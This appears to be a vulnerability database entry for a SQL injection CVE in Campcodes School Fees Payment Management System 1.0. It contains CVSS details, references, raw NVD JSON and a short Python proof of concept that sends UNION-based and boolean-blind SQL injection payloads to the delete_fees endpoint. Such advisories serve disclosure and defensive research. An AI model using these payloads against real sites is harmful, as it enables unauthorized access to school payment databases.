CVE-2025-13274

Description

A weakness has been identified in Campcodes School Fees Payment Management System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=delete_fees. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:school_fees_payment_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes School Fees Payment Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-13274 PoC - Campcodes School Fees Payment Management System SQL Injection
Affected Component: /ajax.php?action=delete_fees (ID parameter)
"""

import requests
import sys

def exploit_sqli(target_url, payload):
    """
    Execute SQL injection attack on delete_fees endpoint
    """
    params = {
        'action': 'delete_fees',
        'id': payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

def extract_db_version(target_url):
    """
    Extract database version using UNION-based injection
    """
    payload = "1 UNION SELECT NULL,version(),NULL,NULL---"
    result = exploit_sqli(target_url, payload)
    if result:
        print("[*] Database version extraction successful")
        return result
    return None

def blind_sqli_test(target_url):
    """
    Test for blind boolean-based SQL injection
    """
    true_payload = "1 AND 1=1"
    false_payload = "1 AND 1=2"
    
    true_resp = exploit_sqli(target_url, true_payload)
    false_resp = exploit_sqli(target_url, false_payload)
    
    if true_resp != false_resp:
        print("[+] Blind SQL injection confirmed")
        return True
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13274.py <target_url>")
        print("Example: python cve-2025-13274.py http://target.com/ajax.php")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing CVE-2025-13274 on {target}")
    
    # Test blind SQL injection
    if blind_sqli_test(target):
        print("[+] Target is vulnerable to SQL injection")
        
    # Extract database version
    version_info = extract_db_version(target)
    if version_info:
        print(f"[*] Version info: {version_info}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13274
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13274
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13274/
[4] VulDB https://vuldb.com/cve/CVE-2025-13274
[5] https://github.com/ASantsSec/CVE/issues/21
[6] https://vuldb.com/?ctiid.332609
[7] https://vuldb.com/?id.332609
[8] https://vuldb.com/?submit.690886
[9] https://www.campcodes.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13274", "sourceIdentifier": "[email protected]", "published": "2025-11-17T10:15:59.000", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Campcodes School Fees Payment Management System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=delete_fees. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:school_fees_payment_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "450DC6BC-1A28-40FC-987F-4AA647D910F5"}]}]}], "references": [{"url": "https://github.com/ASantsSec/CVE/issues/21", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332609", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332609", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.690886", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}